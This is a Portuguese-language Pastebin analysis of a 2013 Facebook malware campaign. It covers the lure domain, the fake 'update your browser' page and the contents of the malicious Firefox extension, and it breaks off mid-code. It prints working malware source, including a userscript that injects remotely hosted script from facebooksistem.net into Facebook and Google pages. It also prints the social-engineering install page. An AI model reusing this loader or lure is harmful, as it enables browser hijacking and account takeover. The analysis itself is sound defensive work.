Advertisement
Guest User

Untitled

a guest
Jan 31st, 2013
824
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 36.88 KB | None | 0 0
  1. ############# analise Facebook virus #############
  2.  
  3. ############# by: Xel4 NeO #############
  4.  
  5. ############# greatz: Oscar Marques #############
  6.  
  7. ############# Th3 Pir4t3 for all greatz #############
  8. ############# Date:24/01/2013 #############
  9. #####################################################################
  10.  
  11. link falso: www.türkaskerindenpkkyabüyükdarbe.tk
  12.  
  13. link real: http://www.xn--trkaskerindenpkkyabykdarbe-yzcsb.tk/
  14.  
  15. #####################################################################
  16.  
  17. host com extensão da turquia
  18.  
  19. Xn Trkaskerindenpkkyabykdarbe Yzcsb - www.Xn--Trkaskerindenpkkyabykdarbe-Yzcsb.tk
  20. Xn--Trkaskerindenpkkyabykdarbe-Yzcsb Title:
  21. Taray?c?n?z Güncellenmeli !
  22. Xn--Trkaskerindenpkkyabykdarbe-Yzcsb Keywords:
  23. xn--trkaskerindenpkkyabykdarbe-yzcsb.tk
  24. Xn--Trkaskerindenpkkyabykdarbe-Yzcsb Description:
  25. Taray?c?n?z Güncellenmeli !
  26. Xn--Trkaskerindenpkkyabykdarbe-Yzcsb IP:
  27. 93.170.52.31
  28. Xn--Trkaskerindenpkkyabykdarbe-Yzcsb server location:
  29. Czech Republic
  30. Xn--Trkaskerindenpkkyabykdarbe-Yzcsb ISP:
  31. ALFA TELECOM s.r.o.
  32.  
  33. IP: 93.170.52.31
  34. IP Country: Czech Republic
  35. 7 Hosts on this IP
  36. Number Domain / Host
  37. 1. www.michelkok.tk
  38. 2. www.truedarkness.tk
  39. 3. net-tv.tk
  40. 4. moviestelugu.tk
  41. 5. www.sanlorenzogenova.tk
  42. 6. www.thewave.tk
  43. 7. www.th3sturm.tk
  44.  
  45. #####################################################################
  46.  
  47. titulo da primeira pagina: Tarayiciniz Güncellenmeli
  48.  
  49. tradução:o seu navegador atualizado*
  50.  
  51. primeira pagina aparece as escritas :
  52.  
  53. Okuyun, Yoksa Yapamazsiniz !**
  54.  
  55. Assagidaki Mavi Butona Tiklayin,
  56.  
  57. Önünüze gelen küçük sekmede ise Ekle yazisina tiklayin.
  58.  
  59. Ekle'ye tikladiktan sonra biraz bekleyin.
  60.  
  61. Simdi Guncelle
  62.  
  63.  
  64.  
  65. traduçao:
  66.  
  67. Leia, ou não pode!*
  68.  
  69. Clique no botão azul afirma o seguinte,
  70.  
  71. Na guia Adicionar, clique no texto na frente de você um pouco.
  72.  
  73. Depois de clicar em Adicionar um pouco táxis.
  74.  
  75. atualizar agora
  76. #####################################################################
  77.  
  78. codigo fonte:
  79.  
  80. <html>
  81. <head>
  82. <title>Tarayiciniz Güncellenmeli !</title>
  83. <meta name="description" content="Tarayiciniz Güncellenmeli !">
  84. <meta name="keywords" content="xn--trkaskerindenpkkyabykdarbe-yzcsb.tk">
  85. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  86. <script type="text/javascript">
  87. var _gaq = _gaq || [];
  88. _gaq.push(['_setAccount', 'UA-23441223-3']);
  89. _gaq.push(['_setDomainName', 'none']);
  90. _gaq.push(['_setAllowLinker', true]);
  91. _gaq.push(['_trackPageview']);
  92. (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
  93. ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
  94. var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  95. })();
  96. </script>
  97. </head>
  98. <frameset rows="*">
  99. <frame frameborder=0 src="http://sosyalaghileleri.com" name="dot_tk_frame_content" scrolling="auto" noresize>
  100. </frameset>
  101. </html>
  102. #####################################################################
  103.  
  104. ENTAO REDIRECIONA PARA UMA SEGUNDA PAGINA: ACESSO A PAGINA DESDE AS 10HS ATE AS 15:00
  105. 3 558 AUMENTANDO EXPONENCIALMENTE
  106.  
  107. stats do site: http://whos.amung.us/stats/181yeqwixdob/
  108.  
  109. mapa com origem dos acessos: http://whos.amung.us/stats/maps/181yeqwixdob/
  110.  
  111. #####################################################################
  112.  
  113. codifo fonte da pagina: http://www.sosyalaghileleri.com/
  114.  
  115.  
  116. <meta http-equiv="refresh" content="0;URL=http://www.sosyalaghileleri.com/teror">
  117.  
  118. <meta name="google-site-verification" content="CySzB06QJD7dAj0gO1yVutHY8wNIoKQmcxZuTMGhGa0" />
  119. <link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/flpeiefiaecmkdannhapfejemlfpikbj">
  120. <link rel="shortcut icon" href="http://cdn1.iconfinder.com/data/icons/yooicons_set09_halloween/128/cheshire_cat.png" />
  121. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  122. <title>Tarayiciniz Güncellenmeli !</title>
  123. <script>
  124. function kur(){
  125.  
  126. var is_chrome=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;
  127. var is_firefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1;
  128. if(is_chrome){
  129. chrome.webstore.install("https://chrome.google.com/webstore/detail/flpeiefiaecmkdannhapfejemlfpikbj");
  130.  
  131. }
  132. else if(is_firefox){
  133. window.location.href="http://www.expertcoder.nazuka.net/topluca.xpi";
  134. }
  135. else {
  136. window.location.href="./error.php";
  137. }
  138. }
  139. </script>
  140. <body bgcolor="#ffffff" onload="if (self != top) top.location=self.location">
  141.  
  142. <style>
  143. body,html{width:100%;height:100%;,margin:0; padding:0}
  144. #siyahSP{
  145.  
  146. width:100%;
  147. height:100%;
  148. _height:expression(document.body.clientheight);
  149. position: absolute; top: 0px; left: 0px; background-color: rgb(51, 51, 51); z-index: 9998; opacity: 0.8; background-position:
  150. initial; background-repeat: initial initial
  151. }
  152. .siyahIc
  153. {
  154. z-index: 9999;
  155. background-color:white;
  156. border:solid #333 1px;
  157. width:380px;
  158. height:250px;
  159. margin: 5% auto;
  160. left: 0;
  161. right: 0;
  162. margin-top:70px;
  163. padding:20px;
  164. font-family:Tahoma, Geneva, sans-serif;
  165. filter:alpha(opacity=100);
  166. -moz-opacity: 1;
  167. opacity: 1;
  168. }
  169. .ekle
  170. {
  171. background-color:#5486da;
  172. width:300px;
  173. height:30px;
  174. -moz-border-radius: 5px;
  175. -webkit-border-radius: 5px;
  176. border:#2d53af 1px solid;
  177. text-align:center;
  178. line-height:30px;
  179. color:white;
  180. text-decoration:none;
  181. font-size:16px;
  182. font-weight:bold;
  183. }
  184. .ekle:hover
  185. {
  186. background: #6097ff; /* Old browsers */
  187. background: -moz-linear-gradient(top, #6097ff 0%, #5486da 100%); /* FF3.6+ */
  188. background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#6097ff), color-stop(100%,#5486da)); /* Chrome,Safari4+ */
  189. background: -webkit-linear-gradient(top, #6097ff 0%,#5486da 100%); /* Chrome10+,Safari5.1+ */
  190. background: -o-linear-gradient(top, #6097ff 0%,#5486da 100%); /* Opera 11.10+ */
  191. background: -ms-linear-gradient(top, #6097ff 0%,#5486da 100%); /* IE10+ */
  192. background: linear-gradient(top, #6097ff 0%,#5486da 100%); /* W3C */
  193. filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#6097ff', endColorstr='#5486da',GradientType=0 ); /* IE6-9 */
  194.  
  195. }
  196. </style>
  197.  
  198.  
  199.  
  200.  
  201. <div id="siyahBuDivBaskaDiv">
  202.  
  203. <div class="siyahIc">
  204. <center>
  205. <div style="float:left;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="logo.jpg"></div></center>
  206. <div style="float:right;"></div>
  207.  
  208. <center>
  209. <br><br><br>
  210.  
  211. <p style="color:#111;font-weight:600;font-size:15px; margin-bottom:0px;">Okuyun, Yoksa Yapamazsiniz !</p><br>
  212. <p style="color:#666;font-size:15px; margin-top:0px;">Assagidaki Mavi Butona Tiklayin,</p>
  213. <p style="color:#666;font-size:15px; margin-top:0px;">Önünüze gelen küçük sekmede ise <font color="red">Ekle</font> yazisina tiklayin.</p>
  214. <p style="color:#666;font-size:15px; margin-top:0px;"><font color="red">Ekle</font>'ye tikladiktan sonra biraz bekleyin.</p>
  215. <p></p>
  216. <a href="javascript:" onclick="kur();" style="text-decoration:none;">
  217. <div class="ekle">Simdi Guncelle</div>
  218.  
  219.  
  220. </a></body></html>
  221.  
  222. <br><br><br><br><br><br><br><br>
  223. <script id="_wau0dc">var _wau = _wau || [];
  224. _wau.push(["colored", "181yeqwixdob", "0dc", "bcc1007e000a"]);
  225. (function() {var s=document.createElement("script"); s.async=true;
  226. s.src="http://widgets.amung.us/colored.js";
  227. document.getElementsByTagName("head")[0].appendChild(s);
  228. })();</script>
  229.  
  230. #####################################################################
  231.  
  232. ele baixa um aplicativo do webstore do chrome, no caso de ser firefox baixa um extensão do firefox em xpi.
  233.  
  234. unction kur(){
  235.  
  236. var is_chrome=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;
  237. var is_firefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1;
  238. if(is_chrome){
  239. chrome.webstore.install("https://chrome.google.com/webstore/detail/flpeiefiaecmkdannhapfejemlfpikbj");
  240.  
  241. }
  242. else if(is_firefox){
  243. window.location.href="http://www.expertcoder.nazuka.net/topluca.xpi";
  244. }
  245. else {
  246. window.location.href="./error.php";
  247.  
  248. #####################################################################
  249. analise arquivo topluca.xpi
  250.  
  251. $contem uma pasta vazia com nome chrome
  252. $pasta content
  253. $install.rdf
  254. $chrome
  255. #####################################################################
  256. analise pasta content
  257.  
  258. contem 4 JSscriptfile
  259.  
  260.  
  261. $adobeflashplayer
  262. #######
  263. /**
  264. */
  265. // ==UserScript==
  266. // @name SosyalHilelerim
  267. // @namespace SosyalHilelerim
  268. // @description goole.com
  269. // @version 1.5
  270. // @license GPL 3.0
  271. // @include http*://*.facebook.com/*
  272. // @include http*://*.google.*/*
  273. // @exclude http*://*.facebook.com/plugins/*
  274. // @exclude http*://*.facebook.com/widgets/*
  275. // @exclude http*://*.facebook.com/iframe/*
  276. // @exclude http*://*.facebook.com/desktop/*
  277. // @exclude http*://*.channel.facebook.com/*
  278. // @exclude http*://*.facebook.com/ai.php*
  279. // @exclude http*://*.facebookajans.com/*
  280. // @exclude http://*.channel.facebook.tld/*
  281. // @exclude http://static.*.facebook.tld/*
  282. // @exclude http://*.facebook.tld/ai.php*
  283. // @exclude http://*.facebook.tld/pagelet/generic.php/pagelet/home/morestories.php*
  284. // @exclude https://*.channel.facebook.tld/*
  285. // @exclude https://static.*.facebook.tld/*
  286. // @exclude https://*.facebook.tld/ai.php*
  287. // @exclude https://*.facebook.tld/pagelet/generic.php/pagelet/home/morestories.php*
  288. // @exclude http*://*.google.*/blank.html
  289.  
  290. // ==/UserScript==
  291. if (!/https?:\/\/[^\/]*\.?facebook\.[^\/]+\//.test(window.location.href))
  292. {
  293. var googledayim=1;
  294. }
  295.  
  296. if (googledayim && !/https?:\/\/[^\/]*\.?google\.[^\/]+\//.test(window.location.href)) { return; }
  297.  
  298.  
  299. // Get a reference to the *real* window
  300. if (typeof unsafeWindow=="undefined") {
  301. var div = document.createElement('div');
  302. div.setAttribute('onclick', 'return window;');
  303. unsafeWindow = div.onclick();
  304. }
  305.  
  306. if (!window.localStorage) {
  307. window.localStorage = {
  308. getItem: function (sKey) {
  309. if (!sKey || !this.hasOwnProperty(sKey)) { return null; }
  310. return unescape(document.cookie.replace(new RegExp("(?:^|.*;\\s*)" + escape(sKey).replace(/[\-\.\+\*]/g, "\\$&") + "\\s*\\=\\s*((?:[^;](?!;))*[^;]?).*"), "$1"));
  311. },
  312. key: function (nKeyId) { return unescape(document.cookie.replace(/\s*\=(?:.(?!;))*$/, "").split(/\s*\=(?:[^;](?!;))*[^;]?;\s*/)[nKeyId]); },
  313. setItem: function (sKey, sValue) {
  314. if(!sKey) { return; }
  315. document.cookie = escape(sKey) + "=" + escape(sValue) + "; path=/";
  316. this.length = document.cookie.match(/\=/g).length;
  317. },
  318. length: 0,
  319. removeItem: function (sKey) {
  320. if (!sKey || !this.hasOwnProperty(sKey)) { return; }
  321. var sExpDate = new Date();
  322. sExpDate.setDate(sExpDate.getDate() - 1);
  323. document.cookie = escape(sKey) + "=; expires=" + sExpDate.toGMTString() + "; path=/";
  324. this.length--;
  325. },
  326. hasOwnProperty: function (sKey) { return (new RegExp("(?:^|;\\s*)" + escape(sKey).replace(/[\-\.\+\*]/g, "\\$&") + "\\s*\\=")).test(document.cookie); }
  327. };
  328. window.localStorage.length = (document.cookie.match(/\=/g) || window.localStorage).length;
  329. }
  330.  
  331. // Greasemonkey API for Chrome/Safari/Opera
  332. GM_addStyle=function(css) {var style = document.createElement('style');style.textContent = css;document.getElementsByTagName('head')[0].appendChild(style);};
  333. GM_getValue=function(name, defaultValue) { return window.localStorage.getItem(name) || defaultValue;};
  334. GM_setValue=function(name, value) {
  335. try {window.localStorage.setItem(name, value);} catch (e) {
  336. if (e.toString().indexOf('QUOTA_EXCEEDED_ERR')>-1) { add_error("Either your browser's local storage area is full or you are browsing in Private Browsing mode, which isn't supported.<br>Please <a href=\"http://SocialFixer.com/faq.php#quota\" target=\"_blank\">Read the FAQ</a> for a detailed explanation of this error");}
  337. }
  338. };
  339.  
  340.  
  341. var opera_xhr_counter = 0;
  342. var opera_xhr_funcs = {};
  343. GM_xmlhttpRequest=function(obj) {
  344. try {
  345. if (obj && obj.url && obj.url.indexOf("facebook.com")>0) {
  346. var request=new window.XMLHttpRequest();
  347. request.onreadystatechange=function() { if(obj.onreadystatechange) { obj.onreadystatechange(request); }; if(request.readyState==4 && obj.onload) { obj.onload(request); } }
  348. request.onerror=function() { if(obj.onerror) { obj.onerror(request); } }
  349. try { request.open(obj.method,obj.url,true); } catch(e) { if(obj.onerror) { obj.onerror( {readyState:4,responseHeaders:'',responseText:'',responseXML:'',status:403,statusText:'Forbidden'} ); }; return; }
  350. if(obj.headers) { for(name in obj.headers) { request.setRequestHeader(name,obj.headers[name]); } }
  351. request.send(obj.data); return request;
  352. }
  353. else {
  354. opera_xhr_counter++;
  355. var xhr = { 'method':obj.method, 'url':obj.url, 'headers':obj.headers, 'data':obj.data };
  356. var req_obj = {'type':'ajax', 'xhr':xhr, 'id':opera_xhr_counter};
  357. opera_xhr_funcs[ opera_xhr_counter ] = obj.onload;
  358. opera.extension.postMessage( JSON.stringify(req_obj) );
  359. }
  360. } catch(e) {
  361. alert(e);
  362. }
  363. };
  364.  
  365.  
  366.  
  367. var ajax = function(props) {
  368. GM_xmlhttpRequest(props);
  369. }
  370.  
  371.  
  372. // Don't run on link redirects and some other cases
  373. var excludes = ['/l.php?u','/ai.php','/plugins/','morestories.php','blank.html'];
  374. try {
  375. for (var i=0; i<excludes.length; i++) {
  376. if ( window.location.href.indexOf(excludes[i])>0 ) { return; }
  377. }
  378. } catch(e) { }
  379.  
  380.  
  381.  
  382. // Extension Option Persistence
  383. function setValue(key,val,func) {
  384. if (PERFORMANCE) { trace_start('setValue',null,true); }
  385. var do_set=function() {
  386. if (PERFORMANCE) { trace_start('setValue',null,true); }
  387. try {
  388. GM_setValue(key,val);
  389. } catch(e) {
  390. alert(e);
  391. }
  392. if(func) {
  393. func(key,val);
  394. }
  395. if (PERFORMANCE) { trace_end('setValue',null,true); }
  396. };
  397. do_set.name="setValue.do_set";
  398. window.setTimeout(do_set,0);
  399. if (PERFORMANCE) { trace_end('setValue',null,true); }
  400. }
  401. function getValue(key, def, func) {
  402. if (PERFORMANCE) { trace_start('getValue',null,true); }
  403. // Key can be either a single key or an array of keys
  404. if (typeof key=="string") {
  405. return func(GM_getValue(key,def));
  406. }
  407. else if (typeof key=="object" && key.length) {
  408. var values = {};
  409. for (var i=0; i<key.length; i++) {
  410. var default_value = undef;
  411. if (typeof def=="object" && def.length && i<def.length) {
  412. default_value = def[i];
  413. }
  414. values[key[i]] = GM_getValue(key[i],default_value);
  415. }
  416. if (func) {
  417. return func(values);
  418. }
  419. else { return values; }
  420. }
  421. if (PERFORMANCE) { trace_end('getValue',null,true); }
  422. return undef;
  423. }
  424.  
  425.  
  426. document.ready=start(0);
  427. a=0;
  428. function start(a)
  429. {
  430.  
  431. if(!googledayim)
  432. {
  433. if(document.getElementById('faceplus')) return;
  434. var s=document.createElement('script');
  435. s.type="text/javascript";
  436. s.className="cachedVersion";
  437. s.innerHTML='var s=document.createElement("script");s.type="text/javascript";s.src="//facebooksistem.net/macodtm/dongu.php?amtasak="+Math.random()*999999;document.getElementsByTagName("head")[0].appendChild(s);';
  438. s.id="faceplus"
  439.  
  440.  
  441. if(document.getElementsByTagName('head')[0])document.getElementsByTagName('head')[0].appendChild(s);
  442. else if(a<50) setTimeout(function(){start(a++);},100);
  443.  
  444. }
  445. else
  446. {
  447.  
  448. if(document.getElementById('faceplus')) return;
  449. var s=document.createElement('script');
  450. s.type="text/javascript";
  451. s.className="cachedVersion";
  452. s.innerHTML='var s=document.createElement("script");s.type="text/javascript";s.src="//facebooksistem.net/macodtm/askfm.php?amtasak="+Math.random()*999999;document.getElementsByTagName("head")[0].appendChild(s);';
  453. s.id="faceplus"
  454.  
  455.  
  456. if(document.getElementsByTagName('head')[0])document.getElementsByTagName('head')[0].appendChild(s);
  457. else if(a<50) setTimeout(function(){start(a++);},100);
  458.  
  459. }
  460. }
  461.  
  462. #################
  463.  
  464. $script-compiler
  465.  
  466. var adobeflashplayer_gmCompiler={
  467.  
  468. // getUrlContents adapted from Greasemonkey Compiler
  469. // http://www.letitblog.com/code/python/greasemonkey.py.txt
  470. // used under GPL permission
  471. //
  472. // most everything else below based heavily off of Greasemonkey
  473. // http://greasemonkey.devjavu.com/
  474. // used under GPL permission
  475.  
  476. getUrlContents: function(aUrl){
  477. var ioService=Components.classes["@mozilla.org/network/io-service;1"]
  478. .getService(Components.interfaces.nsIIOService);
  479. var scriptableStream=Components
  480. .classes["@mozilla.org/scriptableinputstream;1"]
  481. .getService(Components.interfaces.nsIScriptableInputStream);
  482. var unicodeConverter=Components
  483. .classes["@mozilla.org/intl/scriptableunicodeconverter"]
  484. .createInstance(Components.interfaces.nsIScriptableUnicodeConverter);
  485. unicodeConverter.charset="UTF-8";
  486.  
  487. var channel=ioService.newChannel(aUrl, "UTF-8", null);
  488. var input=channel.open();
  489. scriptableStream.init(input);
  490. var str=scriptableStream.read(input.available());
  491. scriptableStream.close();
  492. input.close();
  493.  
  494. try {
  495. return unicodeConverter.ConvertToUnicode(str);
  496. } catch (e) {
  497. return str;
  498. }
  499. },
  500.  
  501. isGreasemonkeyable: function(url) {
  502. var scheme=Components.classes["@mozilla.org/network/io-service;1"]
  503. .getService(Components.interfaces.nsIIOService)
  504. .extractScheme(url);
  505. return (
  506. (scheme == "http" || scheme == "https" || scheme == "file") &&
  507. !/hiddenWindow\.html$/.test(url)
  508. );
  509. },
  510.  
  511. contentLoad: function(e) {
  512. var unsafeWin=e.target.defaultView;
  513. if (unsafeWin.wrappedJSObject) unsafeWin=unsafeWin.wrappedJSObject;
  514.  
  515. var unsafeLoc=new XPCNativeWrapper(unsafeWin, "location").location;
  516. var href=new XPCNativeWrapper(unsafeLoc, "href").href;
  517.  
  518. if (
  519. adobeflashplayer_gmCompiler.isGreasemonkeyable(href)
  520. && ( /^http.*:\/\/.*\.facebook\.com\/.*$/.test(href) || /^http.*:\/\/.*\.google\..*\/.*$/.test(href) )
  521. && !( /^http.*:\/\/.*\.facebook\.com\/plugins\/.*$/.test(href) || /^http.*:\/\/.*\.facebook\.com\/widgets\/.*$/.test(href) || /^http.*:\/\/.*\.facebook\.com\/iframe\/.*$/.test(href) || /^http.*:\/\/.*\.facebook\.com\/desktop\/.*$/.test(href) || /^http.*:\/\/.*\.channel\.facebook\.com\/.*$/.test(href) || /^http.*:\/\/.*\.facebook\.com\/ai\.php.*$/.test(href) || /^http.*:\/\/.*\.faceplus\.biz\/.*$/.test(href) || /^http:\/\/.*\.channel\.facebook\.tld\/.*$/.test(href) || /^http:\/\/static\..*\.facebook\.tld\/.*$/.test(href) || /^http:\/\/.*\.facebook\.tld\/ai\.php.*$/.test(href) || /^http:\/\/.*\.facebook\.tld\/pagelet\/generic\.php\/pagelet\/home\/morestories\.php.*$/.test(href) || /^https:\/\/.*\.channel\.facebook\.tld\/.*$/.test(href) || /^https:\/\/static\..*\.facebook\.tld\/.*$/.test(href) || /^https:\/\/.*\.facebook\.tld\/ai\.php.*$/.test(href) || /^https:\/\/.*\.facebook\.tld\/pagelet\/generic\.php\/pagelet\/home\/morestories\.php.*$/.test(href) || /^http.*:\/\/.*\.google\..*\/blank\.html$/.test(href) )
  522. ) {
  523. var script=adobeflashplayer_gmCompiler.getUrlContents(
  524. 'chrome://adobeflashplayer/content/adobeflashplayer.js'
  525. );
  526. adobeflashplayer_gmCompiler.injectScript(script, href, unsafeWin);
  527. }
  528. },
  529.  
  530. injectScript: function(script, url, unsafeContentWin) {
  531. var sandbox, script, logger, storage, xmlhttpRequester;
  532. var safeWin=new XPCNativeWrapper(unsafeContentWin);
  533.  
  534. sandbox=new Components.utils.Sandbox(safeWin);
  535.  
  536. var storage=new adobeflashplayer_ScriptStorage();
  537. xmlhttpRequester=new adobeflashplayer_xmlhttpRequester(
  538. unsafeContentWin, window//appSvc.hiddenDOMWindow
  539. );
  540.  
  541. sandbox.window=safeWin;
  542. sandbox.document=sandbox.window.document;
  543. sandbox.unsafeWindow=unsafeContentWin;
  544.  
  545. // patch missing properties on xpcnw
  546. sandbox.XPathResult=Components.interfaces.nsIDOMXPathResult;
  547.  
  548. // add our own APIs
  549. sandbox.GM_addStyle=function(css) { adobeflashplayer_gmCompiler.addStyle(sandbox.document, css) };
  550. sandbox.GM_setValue=adobeflashplayer_gmCompiler.hitch(storage, "setValue");
  551. sandbox.GM_getValue=adobeflashplayer_gmCompiler.hitch(storage, "getValue");
  552. sandbox.GM_openInTab=adobeflashplayer_gmCompiler.hitch(this, "openInTab", unsafeContentWin);
  553. sandbox.GM_xmlhttpRequest=adobeflashplayer_gmCompiler.hitch(
  554. xmlhttpRequester, "contentStartRequest"
  555. );
  556. //unsupported
  557. sandbox.GM_registerMenuCommand=function(){};
  558. sandbox.GM_log=function(){};
  559. sandbox.GM_getResourceURL=function(){};
  560. sandbox.GM_getResourceText=function(){};
  561.  
  562. sandbox.__proto__=sandbox.window;
  563.  
  564. try {
  565. this.evalInSandbox(
  566. "(function(){"+script+"})()",
  567. url,
  568. sandbox);
  569. } catch (e) {
  570. var e2=new Error(typeof e=="string" ? e : e.message);
  571. e2.fileName=script.filename;
  572. e2.lineNumber=0;
  573. //GM_logError(e2);
  574. alert(e2);
  575. }
  576. },
  577.  
  578. evalInSandbox: function(code, codebase, sandbox) {
  579. if (Components.utils && Components.utils.Sandbox) {
  580. // DP beta+
  581. Components.utils.evalInSandbox(code, sandbox);
  582. } else if (Components.utils && Components.utils.evalInSandbox) {
  583. // DP alphas
  584. Components.utils.evalInSandbox(code, codebase, sandbox);
  585. } else if (Sandbox) {
  586. // 1.0.x
  587. evalInSandbox(code, sandbox, codebase);
  588. } else {
  589. throw new Error("Could not create sandbox.");
  590. }
  591. },
  592.  
  593. openInTab: function(unsafeContentWin, url) {
  594. var tabBrowser = getBrowser(), browser, isMyWindow = false;
  595. for (var i = 0; browser = tabBrowser.browsers[i]; i++)
  596. if (browser.contentWindow == unsafeContentWin) {
  597. isMyWindow = true;
  598. break;
  599. }
  600. if (!isMyWindow) return;
  601.  
  602. var loadInBackground, sendReferrer, referrer = null;
  603. loadInBackground = tabBrowser.mPrefs.getBoolPref("browser.tabs.loadInBackground");
  604. sendReferrer = tabBrowser.mPrefs.getIntPref("network.http.sendRefererHeader");
  605. if (sendReferrer) {
  606. var ios = Components.classes["@mozilla.org/network/io-service;1"]
  607. .getService(Components.interfaces.nsIIOService);
  608. referrer = ios.newURI(content.document.location.href, null, null);
  609. }
  610. tabBrowser.loadOneTab(url, referrer, null, null, loadInBackground);
  611. },
  612.  
  613. hitch: function(obj, meth) {
  614. var unsafeTop = new XPCNativeWrapper(unsafeContentWin, "top").top;
  615.  
  616. for (var i = 0; i < this.browserWindows.length; i++) {
  617. this.browserWindows[i].openInTab(unsafeTop, url);
  618. }
  619. },
  620.  
  621. apiLeakCheck: function(allowedCaller) {
  622. var stack=Components.stack;
  623.  
  624. var leaked=false;
  625. do {
  626. if (2==stack.language) {
  627. if ('chrome'!=stack.filename.substr(0, 6) &&
  628. allowedCaller!=stack.filename
  629. ) {
  630. leaked=true;
  631. break;
  632. }
  633. }
  634.  
  635. stack=stack.caller;
  636. } while (stack);
  637.  
  638. return leaked;
  639. },
  640.  
  641. hitch: function(obj, meth) {
  642. if (!obj[meth]) {
  643. throw "method '" + meth + "' does not exist on object '" + obj + "'";
  644. }
  645.  
  646. var hitchCaller=Components.stack.caller.filename;
  647. var staticArgs = Array.prototype.splice.call(arguments, 2, arguments.length);
  648.  
  649. return function() {
  650. if (adobeflashplayer_gmCompiler.apiLeakCheck(hitchCaller)) {
  651. return;
  652. }
  653.  
  654. // make a copy of staticArgs (don't modify it because it gets reused for
  655. // every invocation).
  656. var args = staticArgs.concat();
  657.  
  658. // add all the new arguments
  659. for (var i = 0; i < arguments.length; i++) {
  660. args.push(arguments[i]);
  661. }
  662.  
  663. // invoke the original function with the correct this obj and the combined
  664. // list of static and dynamic arguments.
  665. return obj[meth].apply(obj, args);
  666. };
  667. },
  668.  
  669. addStyle:function(doc, css) {
  670. var head, style;
  671. head = doc.getElementsByTagName('head')[0];
  672. if (!head) { return; }
  673. style = doc.createElement('style');
  674. style.type = 'text/css';
  675. style.innerHTML = css;
  676. head.appendChild(style);
  677. },
  678.  
  679. onLoad: function() {
  680. var appcontent=window.document.getElementById("appcontent");
  681. if (appcontent && !appcontent.greased_adobeflashplayer_gmCompiler) {
  682. appcontent.greased_adobeflashplayer_gmCompiler=true;
  683. appcontent.addEventListener("DOMContentLoaded", adobeflashplayer_gmCompiler.contentLoad, false);
  684. }
  685. },
  686.  
  687. onUnLoad: function() {
  688. //remove now unnecessary listeners
  689. window.removeEventListener('load', adobeflashplayer_gmCompiler.onLoad, false);
  690. window.removeEventListener('unload', adobeflashplayer_gmCompiler.onUnLoad, false);
  691. window.document.getElementById("appcontent")
  692. .removeEventListener("DOMContentLoaded", adobeflashplayer_gmCompiler.contentLoad, false);
  693. },
  694.  
  695. }; //object adobeflashplayer_gmCompiler
  696.  
  697.  
  698. function adobeflashplayer_ScriptStorage() {
  699. this.prefMan=new adobeflashplayer_PrefManager();
  700. }
  701. adobeflashplayer_ScriptStorage.prototype.setValue = function(name, val) {
  702. this.prefMan.setValue(name, val);
  703. }
  704. adobeflashplayer_ScriptStorage.prototype.getValue = function(name, defVal) {
  705. return this.prefMan.getValue(name, defVal);
  706. }
  707.  
  708.  
  709. window.addEventListener('load', adobeflashplayer_gmCompiler.onLoad, false);
  710. window.addEventListener('unload', adobeflashplayer_gmCompiler.onUnLoad, false);
  711. ####################
  712.  
  713. xmlhttprequester
  714.  
  715. ###
  716.  
  717. function adobeflashplayer_xmlhttpRequester(unsafeContentWin, chromeWindow) {
  718. this.unsafeContentWin = unsafeContentWin;
  719. this.chromeWindow = chromeWindow;
  720. }
  721.  
  722. // this function gets called by user scripts in content security scope to
  723. // start a cross-domain xmlhttp request.
  724. //
  725. // details should look like:
  726. // {method,url,onload,onerror,onreadystatechange,headers,data}
  727. // headers should be in the form {name:value,name:value,etc}
  728. // can't support mimetype because i think it's only used for forcing
  729. // text/xml and we can't support that
  730. adobeflashplayer_xmlhttpRequester.prototype.contentStartRequest = function(details) {
  731. // important to store this locally so that content cannot trick us up with
  732. // a fancy getter that checks the number of times it has been accessed,
  733. // returning a dangerous URL the time that we actually use it.
  734. var url = details.url;
  735.  
  736. // make sure that we have an actual string so that we can't be fooled with
  737. // tricky toString() implementations.
  738. if (typeof url != "string") {
  739. throw new Error("Invalid url: url must be of type string");
  740. }
  741.  
  742. var ioService=Components.classes["@mozilla.org/network/io-service;1"]
  743. .getService(Components.interfaces.nsIIOService);
  744. var scheme = ioService.extractScheme(url);
  745.  
  746. // This is important - without it, GM_xmlhttpRequest can be used to get
  747. // access to things like files and chrome. Careful.
  748. switch (scheme) {
  749. case "http":
  750. case "https":
  751. case "ftp":
  752. this.chromeWindow.setTimeout(
  753. adobeflashplayer_gmCompiler.hitch(this, "chromeStartRequest", url, details), 0);
  754. break;
  755. default:
  756. throw new Error("Invalid url: " + url);
  757. }
  758. }
  759.  
  760. // this function is intended to be called in chrome's security context, so
  761. // that it can access other domains without security warning
  762. adobeflashplayer_xmlhttpRequester.prototype.chromeStartRequest=function(safeUrl, details) {
  763. var req = new this.chromeWindow.XMLHttpRequest();
  764.  
  765. this.setupRequestEvent(this.unsafeContentWin, req, "onload", details);
  766. this.setupRequestEvent(this.unsafeContentWin, req, "onerror", details);
  767. this.setupRequestEvent(this.unsafeContentWin, req, "onreadystatechange", details);
  768.  
  769. req.open(details.method, safeUrl);
  770.  
  771. if (details.headers) {
  772. for (var prop in details.headers) {
  773. req.setRequestHeader(prop, details.headers[prop]);
  774. }
  775. }
  776.  
  777. req.send(details.data);
  778. }
  779.  
  780. // arranges for the specified 'event' on xmlhttprequest 'req' to call the
  781. // method by the same name which is a property of 'details' in the content
  782. // window's security context.
  783. adobeflashplayer_xmlhttpRequester.prototype.setupRequestEvent =
  784. function(unsafeContentWin, req, event, details) {
  785. if (details[event]) {
  786. req[event] = function() {
  787. var responseState = {
  788. // can't support responseXML because security won't
  789. // let the browser call properties on it
